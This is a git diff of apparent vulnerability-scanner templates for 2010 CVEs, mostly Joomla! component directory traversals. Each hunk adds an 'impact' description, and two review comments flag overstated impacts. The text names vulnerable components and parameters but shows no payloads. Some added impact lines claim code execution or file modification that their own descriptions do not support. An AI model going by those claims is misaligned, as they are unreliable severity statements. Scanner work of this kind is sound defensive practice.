b/http/cves/2010/CVE-2010-1533.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12142 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 97e2f8b680..986b65fbd9 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component TRAVELbook or apply the necessary patches to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 4e5fb08797..ed6823bd03 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: | Apply the latest security patches or updates provided by Joomla! to fix the directory traversal vulnerability in com_blog component. reference: diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index 4d70f603eb..45b1714e0c 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware. remediation: | Apply the latest patches or updates provided by HP to fix the open redirect vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 0b308e76cf..7c3d7de74b 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage. remediation: | Apply the latest security patches or upgrade to a patched version of Joomla! Component JA Comment to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 50063fbc7c..40b0112b73 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component ZiMB Comment or apply the provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 871cb70ce9..caf4048c6e 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12284 diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 21cadfdabc..d09211a4e2 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Update Joomla! Component WMI to the latest version or apply the provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 4fa5b296a7..217c10b797 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the entire Joomla! installation. remediation: | Update Joomla! Component Graphics to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 02a1a91fc0..8095ffc8e3 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component SmartSite or apply the necessary patches to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index df934b435a..377b6971b2 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can allow an attacker to read arbitrary files on the server, potentially leading to unauthorized access, sensitive information disclosure, or further attacks. remediation: | Update to the latest version of Joomla! Component NoticeBoard or apply the necessary patches to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index aca6b5dab9..4a9e8567c7 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: | Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in Ultimate Portfolio 1.0 component. reference: diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index 9a0a597930..1641f405da 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Apply the latest patch or upgrade to a newer version of the Joomla! Component iF surfALERT to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index a05173fd97..a460cabfbb 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Apply the latest security patches or updates provided by the Joomla! Component MT Fire Eagle 1.2 vendor. reference: diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index 2518f37eb0..099e082cdb 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in the Online Market 2.x component. reference: diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 42826ae2cf..2d90d022a2 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system. remediation: | Update to the latest version of the iNetLanka Contact Us Draw Root Map component or apply the patch provided by the vendor to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 1781de6033..0303382548 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11853 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index ea84d01d63..2be3dd1b80 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -5,6 +5,8 @@ info: author: b0yd severity: medium description: A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of ListSERV Maestro that is not affected by this vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index e04c715081..e5dd5a9d38 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + This vulnerability can result in the exposure of sensitive data, such as configuration files, database credentials, or other sensitive information stored on the server. remediation: | To remediate this vulnerability, it is recommended to update the affected Joomla! component to the latest version or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index c974844413..9b0d09996d 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Apply the latest patch or upgrade to a newer version of the Joomla! Component OrgChart to mitigate the vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 393f882215..0ed11f6302 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12239 diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 7b26216328..26d14ae791 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12288 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 528bc4d454..240a101e1a 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12238 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 3456eec27c..101f243bfc 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12285 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index bc44b3274a..7b613426c8 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12235 
diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 251d86e10d..5938b2cede 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12083 diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 69988a1239..3cefd34f54 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12088 diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index 525dd59f40..448b0e63fb 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12085 diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 4190e6e9b4..b9b1de7d36 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12087 diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 4217d612fc..188cd56173 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12121 diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 143116f43b..0ab91d5d4a 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12055 diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index 5ca9f60fc1..3c1464c312 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index d700c91591..ce91bb5a74 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34003 diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 06ddd8ceb0..6b30948c96 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34006 diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 0789ec5658..3519d447c0 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34004 diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index a6a87d6481..d37195e0e0 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + This vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34005 diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 386617fa95..bb282e9dcf 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12595 diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 9d90510fc8..e68750deec 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12611 diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 95e9e13594..91a2159eca 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can retrieve arbitrary files from the server, potentially leading to unauthorized access or sensitive data exposure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12623 diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 0b9e6a917b..65e52007ea 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml 
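Review bot: the impact line in the CVE-2010-2050 hunk overstates the finding: the description says the traversal lets remote attackers "read arbitrary files", and nothing in the template supports "potentially execute arbitrary code". Trim it to file disclosure, e.g. `Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.`, which is the wording this patch already uses for the other read-only traversals. The CVE-2010-2122 hunk is fine as written.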
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12607 diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index fc01ea65b1..b34e16609f 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/10946 diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 462c397774..7386929571 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. + impact: | + An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: Upgrade to a supported product version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 6474e0f8ec..505c86bfc6 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/13981 diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 262d95e344..85e3b0243c 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml 
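Review bot: the impact line in the CVE-2010-2307 hunk claims an attacker can "read, modify, or delete arbitrary files", but the description only supports reading ("allow remote attackers to read arbitrary files via ... sequences in a URL request"). Drop "modify, or delete" and the "system compromise" clause so the impact stays within what the template and its NVD reference describe, e.g. `An attacker can read arbitrary files from the modem's web server, potentially exposing configuration data or other sensitive information.` The CVE-2010-2507 hunk is consistent with its description.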
